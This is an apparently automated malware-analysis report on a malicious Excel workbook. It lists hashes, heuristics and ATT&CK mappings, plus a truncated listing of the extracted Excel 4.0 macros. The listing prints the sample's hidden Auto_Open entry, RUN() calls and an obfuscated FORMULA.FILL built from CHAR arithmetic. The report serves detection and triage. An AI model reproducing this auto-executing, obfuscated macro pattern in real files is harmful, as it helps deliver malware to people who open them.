Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aa1dadf0107298bf…

MALICIOUS

Office (OLE)

170.5 KB Created: 2020-05-13 12:30:30 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: 907a3ca14a7d7d8935c6cef6b3099595 SHA-1: 09a795336c10b97afa220def992d2737ef89be8d SHA-256: aa1dadf0107298bff7b12b954abe0123b01b4f199c37c7ba651bbdfe15826f5c
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known method for executing malicious code upon opening the workbook. The macro sheet contains a call to the RUN function, which is a dangerous API that can be used to execute arbitrary commands. This suggests the file is designed to download and execute a second-stage payload.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 128605 bytes
SHA-256: a31815bf21c0ab2a75be3cd45bcdb326bdb96c851baf6b9878f1b9c507196fd8
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!FB24833 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,BD17,"",343.00000000000000000000
'  Sheet,BH65,"",-4.97619047619047627506
'  Sheet,S97,"",-5.32019704433497508944
'  Sheet,FT121,"",209.00000000000000000000
'  Sheet,S137,"",-310.00000000000000000000
'  Sheet,GT141,"",-3.30049261083743816769
'  Sheet,GR142,"",0.14634146341463413754
'  Sheet,IN149,RUN(JR64351),""
'  Sheet,CH191,"",254.00000000000000000000
'  Sheet,CO209,"",-75.00000000000000000000
'  Sheet,DT225,"",3.41666666666666651864
'  Sheet,DQ243,"",7.77500488281249957367
'  Sheet,CC360,"",-375.00000000000000000000
'  Sheet,BU392,"",37.00000000000000000000
'  Sheet,JE416,"",0.90833333333333332593
'  Sheet,GO420,"",-72.00000000000000000000
'  Sheet,BP465,"",257.00000000000000000000
'  Sheet,JO480,"",2.20623501199040772391
'  Sheet,GO497,"",-112.00000000000000000000
'  Sheet,GQ556,"",2.39393939393939403359
'  Sheet,DP563,"",-0.48780487804878047697
'  Sheet,BC566,"",0.86124401913875603398
'  Sheet,HX578,"",-2.46305418719211832723
'  Sheet,DB649,"",4.47222222222222232091
'  Sheet,GC666,"",6.00000000000000000000
'  Sheet,BZ715,"",0.23697916666666665741
'  Sheet,EX733,"",218.00000000000000000000
'  Sheet,JO754,"",-4.28571428571428558740
'  Sheet,FF866,"",-288.00000000000000000000
'  Sheet,IC919,"",-44.30000000000000426326
'  Sheet,O934,"",-1.35999900000000017997
'  Sheet,JS956,"",111.00000000000000000000
'  Sheet,V983,"",0.11881188118811880639
'  Sheet,EA1086,"",1.00510204081632648077
'  Sheet,Q1090,"",-261.00000000000000000000
'  Sheet,R1100,"",0.08333333333333332871
'  Sheet,II1127,"",-224.00000000000000000000
'  Sheet,HG1263,"",-0.29646017699115045918
'  Sheet,FK1265,"",56.30000000000000426326
'  Sheet,Q1275,"",1.06858054226475296389
'  Sheet,IV1301,"",41.00000000000000000000
'  Sheet,EE1336,"",0.81218274111675126115
'  Sheet,DB1500,"",-229.00000000000000000000
'  Sheet,CP1570,"",0.41386554621848736790
'  Sheet,CK1622,"",336.00000000000000000000
'  Sheet,CP1663,"",172.00000000000000000000
'  Sheet,IR1663,"",-5.09756097560975618421
'  Sheet,GW1757,"",0.82500061035156246891
'  Sheet,DY1765,"",-289.00000000000000000000
'  Sheet,IT1785,"",1.08108108108108114109
'  Sheet,GM1823,"",-348.00000000000000000000
'  Sheet,EB1856,"",-0.72727272727272729291
'  Sheet,HL1860,"",2.18225419664268560638
'  Sheet,IF1890,"",-88.00000000000000000000
'  Sheet,JQ1901,"",-196.00000000000000000000
'  Sheet,CE1911,"",277.00000000000000000000
'  Sheet,BP1935,"",-2.90178571428571441260
'  Sheet,GH1952,"",0.48762376237623761277
'  Sheet,JT1964,"",-8.70833333333333392545
'  Sheet,BN2007,"",-5.55000488281249992895
'  Sheet,CC2024,"",90.30007812499999886313
'  Sheet,BQ2028,"",4.00000000000000000000
'  Sheet,JB2028,"",12.00000000000000000000
'  Sheet,DD2049,"",-148.00000000000000000000
'  Sheet,JU2160,"",-5.78823529411764692298
'  Sheet,IJ2230,"",566.00000000000000000000
'  Sheet,IZ2254,"",2.77477477477477485479
'  Sheet,BK2387,"",4.00000000000000000000
'  Sheet,FW2390,"FORMULA.FILL(CHAR(T31774-GY32083)&CHAR(T31774+DX48757)&CHAR(FE984-IH18784)&CHAR(DG32354/BN65075)&CHAR(T31774+JG38594)&CHAR(GL695+JJ30532)&CHAR(K20656/ER35049)&CHAR(K20656*GL15773)&CHAR(JC11703*DI41309)&CHAR(GL695/CA4554)&CHAR(DI58491/IN2905)&CHAR(GL695/JG22019)&CHAR(T31774-DJ48336)&CHAR(J3105-IV51366)&CHAR(DG32354-CD8198)&CHAR(K20656*HV55895)&CHAR(J3105/O11920)&CHAR(DE56695*IG14371)&CHAR(J3105*CL9659)&CHAR(DG32354-BC7645)&CHAR(DG32354-CD52859)&CHAR(DI58491-JH27430)&CHAR(K20656*CM36843)&CHAR(DG32354/HD36454)&CHAR(DI58491*HJ5193)&CHAR(DE56695*BD18094),FW2391)",""
'  Sheet,CJ2391,"",137.00000000000000000000
'  Sheet,FW2392,RUN(CJ5851),""
'  Sheet,HM2471,"",496.00000000000000000000
'  Sheet,IX2530,"",
... (truncated)